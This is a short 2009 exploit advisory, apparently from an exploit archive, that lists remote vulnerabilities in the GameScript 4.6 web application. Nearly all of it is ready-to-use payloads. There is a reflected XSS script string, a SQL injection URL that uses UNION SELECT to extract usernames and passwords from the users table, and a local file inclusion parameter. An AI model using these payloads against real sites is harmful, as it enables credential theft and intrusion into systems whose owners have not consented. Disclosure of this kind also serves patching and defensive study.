[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GameScript 4.6 (XSS/SQL/LFI) Multiple Remote Vulnerabilities
# Published : 2009-01-28
# Author : Encrypt3d.M!nd
# Previous Title : Chipmunk Blog (Auth Bypass) Add Admin Exploit
# Next Title : Gazelle CMS (template) Local File Inclusion Vulnerability
GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)
By : Encrypt3d.M!nd
Demo :www.gsdemo.com
just bored :)
There are other vulnerabillities i think
Iam Iraqian...Not Arabian
###################################################
Xss :
/games.php?search="<script>alert(666);</script>
Sql injection :
/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*
Local File Include :
/page.php?page=file_to_include
# www.Syue.com [2009-01-28]